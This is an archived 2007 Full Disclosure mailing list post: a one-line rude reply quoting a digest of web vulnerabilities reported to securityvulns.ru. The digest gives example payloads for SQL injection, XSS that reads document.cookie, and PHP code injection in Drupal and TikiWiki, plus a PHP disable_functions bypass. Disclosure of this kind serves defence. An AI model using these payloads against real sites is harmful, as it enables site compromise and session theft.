Full Disclosure mailing list archives
Re: Vulnerabilities digest
From: <full-disclosure () hushmail com>
Date: Wed, 10 Oct 2007 15:01:09 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SHUT UP VLADIS On Wed, 10 Oct 2007 14:19:25 -0400 3APA3A <3APA3A () SECURITY NNOV RU> wrote:
Dear bugtraq () securityfocus com, Vulnerabilities reported by different Russian speaking authors to http://securityvulns.ru 1. Elekt(Antichat.ru) reports protection bypass vulnerability in PHP 4 and 5. disable_functions feature can be bypassed by using functions alias. A list of aliases is given in http://php.net/aliases/. For example, ini_alter() may be used instead of ini_set() and vice versa. SecurityVulns issue: http://securityvulns.com/news/PHP/alias- pb.html Original message (in Russian): http://securityvulns.ru/Sdocument67.html 2. MustLive reports Crossite-Cripting vulnerability in WordPress MultiUser 1.0 XSS is possible via Username form field. Additional information (in Ukranian): http://websecurity.com.ua/1269/ Original message (in Russian): http://securityvulns.ru/Rdocument875.html 3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5 Example: http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL] http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&q uestId=[SQL] Original message (in Russian): http://securityvulns.ru/Rdocument901.html 4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13 An example of vulnerability is http://site/index.php?option=com_search&searchword=';alert('XSS')// Additional information (in Ukranian): http://websecurity.com.ua/1203/ Original message (in Russian): http://securityvulns.ru/Rdocument919.html 5. durito [NGH Group] reports crossite-scripting vulnerability in ActiveKB NX 2.5.4 Example: http://www.example.com/activekb/ActiveKB/?page=[XXS] Original message (in Russian): http://securityvulns.ru/Rdocument956.html 6. "noname indexed" reports vulnerability in UMI CMS (http://uni- cms.ru) Vulnerability example: http://example.com/search/search_do/?search_string=%22%20onmouseove r=%22javacript:alert(); Original message (in Russian): http://securityvulns.ru/Rdocument957.html 7. MustLive reports cross-site scripting vulnerability in Nucleus. Example: http://site/index.php?blogid=1&archive=2007-01- 01%3Cscript%3Ealert(document.cookie)%3C/script%3E Additional information (in Ukranian): http://websecurity.com.ua/1347/ Original message (in Russian): http://securityvulns.ru/Sdocument3.html 8. durito [NGH Group] reports 8.1 multiple SQL injections in Stride v1.0 Content Management System, Merchant, Courses. Examples: Content Management System http://www.example.com/main.php?p=[SQL] Merchant http://www.example.com/shop.php?cmd=sto&id=[SQL] Courses http://www.example.com/detail.php?course=[SQL] http://www.example.com/detail.php?provider=[SQL] 8.2 Information leak (FTP access account) with MyFTPUploader within same applications. Example: http://www.example.com/include/imageupload.js contains document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">'); document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">'); document.writeln('<param name="host" value="www.target.com">'); document.writeln('<param name="userName" value="target">'); document.writeln('<param name="password" value="target">'); 8.3 Default administrator's password for same applications. Original message (in Russian): http://securityvulns.ru/Sdocument4.html 9. MustLive reports multiple crossite scripting vulnerabilities in Site-Up <= 2.64 Via "search" and "search mask" fields of http://site/siteuprus/index.cgi: Additional information (in Ukranian): http://websecurity.com.ua/1210/ Original message: (in Russian): http://securityvulns.ru/Sdocument12.html 10. MustLive reports crossite scripting in Google Search Appliance. Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s cript%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x' Additional information (in Ukranian): http://websecurity.com.ua/1368/ Original message (in Russian): http://securityvulns.ru/Sdocument32.html 10. MustLive reports crossite scripting in PRO-search Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3 E Additional information (in Ukranian): http://websecurity.com.ua/1224/ Original message (in Russian): http://securityvulns.ru/Sdocument68.html 10. MustLive reports multiple vulnerabilities in Urchin Web Analytics 5.7.03. In addition to re-discovered XSS vulnerability, there is also authentication bypass (access without username/password). Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301 &bd=20070703&ed=20070703&dt=4>ype=5 Additional information (in Ukranian): http://websecurity.com.ua/1283/ Original message: (in Russian): http://securityvulns.ru/Sdocument90.html 11. MustLive reports crossite scripting vulnerability in Mozilla Firefox <= 2.0 with gopher: protocol URL if UTF-7 if page content is displayed as UTF-7. Examples: For Firefox before 2.0: gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4- gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw- SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4- For Firefox 2.0: gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4- gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw- SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4- According to author, it's possible to execute script in both local zone and context of gopher site. 12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector with Drupal <= 5.2. Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal _eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo(); Original message (in Russian): http://securityvulns.ru/Sdocument137.html 13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8. Example: http://www.example.com/tikiwiki/tiki- graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png &title= Original message (in Russian): http://securityvulns.ru/Sdocument162.html Also, multiple vulnerabilities were reported in English by :: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html and r0t: http://securityvulns.com/source12948.html -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcNIXUACgkQ+dWaEhErNvSx3AP8CerSijQ2isO5LY36fadxrILLiQok XJi0X3Sa+AooEb2m9if9CdMhel7A3a4yyBMqVOWfWF1hbxccpeNS0Fi1OKXNoYwMpRIe PKST+uLl+dMxMKicDIMkRo4xyVc76+X/uq5b5IAk4vrR27CX/4yFHBboDK3cDptsQ9C6 6LtRXXA= =tavm -----END PGP SIGNATURE----- -- Discount Online Trading - Click Now! http://tagline.hushmail.com/fc/Ioyw6h4dPYvcpmGb9tTkWB5jLIFiSCd0JeGTaxcz8UO3dwnuZGxWsg/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerabilities digest 3APA3A (Oct 10)
- <Possible follow-ups>
- Re: Vulnerabilities digest full-disclosure (Oct 10)